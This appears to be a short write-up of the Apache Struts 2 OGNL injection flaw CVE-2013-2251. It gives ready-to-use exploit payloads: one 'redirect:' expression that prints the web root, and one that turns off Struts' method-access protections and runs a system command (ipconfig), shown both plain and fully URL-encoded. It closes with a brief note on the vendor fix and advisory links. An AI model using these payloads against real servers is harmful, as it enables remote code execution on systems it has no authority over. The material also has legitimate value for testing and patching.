A remote users can execute an arbitrary code on the affected system. A remote user can conduct URL redirection attacks as well. A remote user can submit a URL with specially crafted ‘action:’, ‘redirect:’ or ‘redirectAction:’ parameter values to cause the system to evaluate the values as an OGNL expression and potentially execute arbitrary code on the target system [CVE-2013–2251]
Apache Struts (2.0.0 to 2.3.15) allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
Example-
http://[target]/struts2/login.action?redirect:http://www.google.com%25[exploit code]
http://[target]/struts2/login.action?redirect:$[exploit code]
Checking the Vulnerability-
Exploiting the Vulnerability-
GetWebDirectory-
redirect:${#req=#context.get(‘co’+’m.open’+’symphony.xwo’+’rk2.disp’+’atcher.HttpSer’+’vletReq’+’uest’),#resp=#context.get(‘co’+’m.open’+’symphony.xwo’+’rk2.disp’+’atcher.HttpSer’+’vletRes’+’ponse’),#resp.setCharacterEncoding(‘UTF-8’),#ot=#resp.getWriter (),#ot.print(‘web’),#ot.print(‘path:’),#ot.print(#req.getSession().getServletContext().getRealPath(‘/’)),#ot.flush(),#ot.close()}
IPConfig-
redirect:${#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#f=#_memberAccess.getClass().getDeclaredField(‘allowStaticMethodAccess’),#f.setAccessible(true),#f.set(#_memberAccess,true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘ipconfig’).getInputStream())}
http://<IP Address>/logout.action?redirect:$%7b%23%63%6f%6e%74%65%78%74%5b%27%78%77%6f%72%6b%2e%4d%65%74%68%6f%64%41%63%63%65%73%73%6f%72%2e%64%65%6e%79%4d%65%74%68%6f%64%45%78%65%63%75%74%69%6f%6e%27%5d%3d%66%61%6c%73%65%2c%23%66%3d%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2e%67%65%74%43%6c%61%73%73%28%29%2e%67%65%74%44%65%63%6c%61%72%65%64%46%69%65%6c%64%28%27%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%27%29%2c%23%66%2e%73%65%74%41%63%63%65%73%73%69%62%6c%65%28%74%72%75%65%29%2c%23%66%2e%73%65%74%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2c%74%72%75%65%29%2c%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%69%70%63%6f%6e%66%69%67%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%7d
Mitigation-
The vendor has issued a fix (2.3.15.1). The vendor’s advisory is available at:
http://struts.apache.org/release/2.3.x/docs/s2-016.html
http://struts.apache.org/release/2.3.x/docs/s2-017.htm
More Reading-
https://waf.ninja/struts2-vulnerability-evolution/#s2016